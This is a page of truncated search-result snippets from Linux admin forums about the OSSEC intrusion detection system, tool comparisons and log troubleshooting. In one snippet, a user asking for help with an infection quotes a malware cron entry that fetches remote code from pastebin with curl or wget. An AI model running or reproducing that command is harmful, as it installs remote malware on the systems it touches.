search for: ossec

Puppet custom functions and user permissions I am busy writing a custom function to automatically add OSSEC agents to a OSSEC server after installation. Unfortunately, it seems that puppetmasterd is not respecting the entries in /etc/group in linux. No matter how many other groups the puppet user has been added to in /etc/ group, when puppetmasterd runs the custom function the effective/real user always...

Hi, I''m a fairly new to Puppet but so far have been very pleased with the recipes and my own simple scripts. However, I''ve hit a wall in the form of OSSEC, (http://www.ossec.net/main/) Most of my servers are running ubuntu or debain and neither support OSSEC via apt-get. I''ve thought about setting up my own local repository to handle this and to also package my own puppet updates. However the recommend install of OSSEC is via an interactive...

Starting with a fresh load and after I finish hardening the load following the Center for Internet Security (CIS) guidance, I'm wondering whether AIDE or OSSEC would be a better intrusion detection system. I installed AIDE and did a quick test of AIDE and after initializing the db and applying the recent cups update, I found that 1700+ files had changed. Those are a lot of changes to wade through to determine if they are legit or not. If that is all tha...

Hi. I have an interesting use case. OSSEC is security tool based on server-client architecture. Server generates keys for agents, and every agent has different key. Now I want to distribute these keys via puppet. I''ve come accross hiera and installed it, and it works superbly, but how to store per-node key in hiera? This is m...

...pped by the script and append it to another file. However, the below script is not able to grep the desired logs, so I need some help in preparing the script. I am running Centos 5.2 32-bit. for (( i = 5; i >=0; i-- )) ; do grep $(date "+%a %b %d %R %Y" -d "-$i min") /var/ossec/logs/active-responses.log >> /tmp/newlog.log;done /var/ossec/logs/active-responses.log format is below Fri Jun 3 15:38:14 IST 2011 /var/ossec/active-response/bin/host-deny.sh add - 172.31.5.12 1307095694.71353 31151 Fri Jun 3 15:38:14 IST 2011 /var/ossec/active-response/bin/firewall-drop....

...that I can't easily control vs. putting strict limits on ssh. We simply have too many users entering from too many networks many with dynamic IP addresses. Enter.... thinking about LIDS or Log Based Intrusion Detection. I've run across four systems. Blockhosts, DenyHosts, fail2ban and OSSEC. DenyHosts apparently only works with ssh, so I've discounted using that. Is anyone using one of these or something else that I've missed. At present, I'm leaning towards OSSEC for several reasons. First it seems very robust. Second, you can set up a server/client structure, so only...

Another alternative is to use a FIMS/HIDS such as Aide (Advanced Intrusion Detection Environment), OSSEC or Samhain. Be prepared to learn a lot about what your OS normally does behind the scenes (and thus a fair amount of initial fine tuning to exclude those things). Aide seems to work well (I've seen only one odd result) and is quite granular. However, it is local system based rather than cent...

... using it as a tool and understanding what it does... So one part of it's toolset identifys valid SIP accounts - and I was under the impression that alwaysauthreject=yes was supposed to stop this... However, it sends a request for a highly probably non-existent account, then sends requests for probably existing accounts and I guess compares the results - account not found vs. bad

...x216 Aug 15 23:01:28 mydomain kernel: eax: 00000000 ebx: c54ee0e0 ecx: ffffffff edx: 00000000 Aug 15 23:01:28 mydomain kernel: esi: c54ee0e4 edi: 00000000 ebp: c1be11e4 esp: c48f8f60 Aug 15 23:01:28 mydomain kernel: ds: 007b es: 007b ss: 0068 Aug 15 23:01:28 mydomain kernel: Process ossec-syscheckd (pid: 11762, threadinfo=c48f8000 task=c75a27e0) Aug 15 23:01:28 mydomain kernel: Stack: bff7125c c7ff5420 c0180d15 c48f8fa0 c717f920 c0372960 c717f920 c7f2b8b0 Aug 15 23:01:28 mydomain kernel: c0180d15 c018097e c48f8fa0 ffffffda 0856a5dc c717f920 00000000 c0180fcb Aug 15 23:01:28 m...

Hello guys, Whats is the best way to identify a possible user using a botnet with php in the server? And if he is using GET commands for example in other server. Does apache logs outbound conections ? If it is using a file that is not malicious the clam av would not identify. Thanks

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I''ve created an ssh_keys class that just makes sure that all my Puppet managed hosts get the same set of hosts keys using the "sshkey" type. I also am starting to play with OSSEC HIDS which is a host based intrusion detection system. OSSEC HIDS has been letting me know that the MD5 and SHA1 hashes of /etc/ssh/ssh_known_hosts has been changing regularly as Puppet runs. Now, I''ve not added or changed anything with my ssh keys so I would expect either: a) it sees...

Hello all, I have been exploring the various intrusion detection systems available for the Linux platform and was wondering what ones you all would recommend? I have used AIDE before and while it is extremely easy to setup, it does not support the ability to send alerts as files are changed (allows one to be aware of an intrusion almost immediately). Thank you, Dan Burkland ?

I have a client project to implement PCI/DSS compliance. The PCI/DSS auditor has stipulated that the web server, application middleware (tomcat), the db server have to be on different systems. In addition the auditor has also stipulated that there be a NTP server, a "patch" server, The Host OS on all of the above nodes will be CentOS 6.2. Below is a list of things that would be

...e specific example is crond; Chkconfig output: crond 0:off 1:off 2:on 3:on 4:on 5:on 6:off permissions in init.d: -rwxr-xr-x 1 root root 2793 Jul 18 2011 crond The processes that aren't loading are; Clamd, directadmin, exim, freshclam, httpd, mysqld, ossec, proftpd, sshguard Any ideas what I need to check/change to resolve this problem? Thanks everyone!

This is one where there's probably no limit to what you could do. We have a high-security environment and are using Aide and OSSEC. Aide has been good at reporting file system changes and is very granular, the dilemma is what to monitor and what to ignore (keep from being inundated with reports of innocuous changes at the risk of missing something). However, it is not daemon-based so changes between runs which are undone go...

I want to add an entry to a database every time a brute force registration attempt is done. from this database we are updating cisco routers with our ban list so our entire network is protected. The database side of things is working and has been for some time. I really would like to add the file2ban side of it to protect our asterisk system better. How would I best go about doing this

How do you know when a Linux system has been compromised?? Every day I watch our systems with all the typical tools, ps, top, who, I watch firewall / IPS logs, I have logwatch setup and mailing daily summaries to me and I dive deeper into logs if something looks suspicious. What am I missing or not looking at that you security gurus are looking at? I subscribe to the centos and SANS

...be a kiddie script. Mostly trying to access several of our servers with the username anna. All failed... in fact I don't think we have a user anna on any of our servers. Meanwhile... I'm running Sendmail. This pertains to Centos 4 and 5 servers. I'm also running fail2ban on some and Ossec on others. So far, no blocking is being done. When I look at the logs all I find is under messages and here is a sample: Feb 10 05:23:08 neptune saslauthd[3370]: do_auth : auth failure: [user=anna] [service=smtp] [realm=] [mech=shadow] [reason=Unknown] Feb 10 05:23:25 neptune saslauthd[...

Hi, Is there a way to find out how the CentOS 7.5 Linux box got infected with malware? Currently i am referring to http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malwareransomware.html to carry out the below steps and is done manually. 1)rm -fr /tmp/*timesyncc.service* 2)crontab -e -u apigee delete the cron entry */1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget

... Looking for a recommendation for a commercial threat management package. ( Think antivirus / antispy / anti-rootkit -- all rolled into one engine ), similar to this product: http://usa.kaspersky.com/products_services/work-space-security.php, which currently only supports one kernel for FC6, and RHEL4, officially. Here's the background. Need to make a decision and investment for a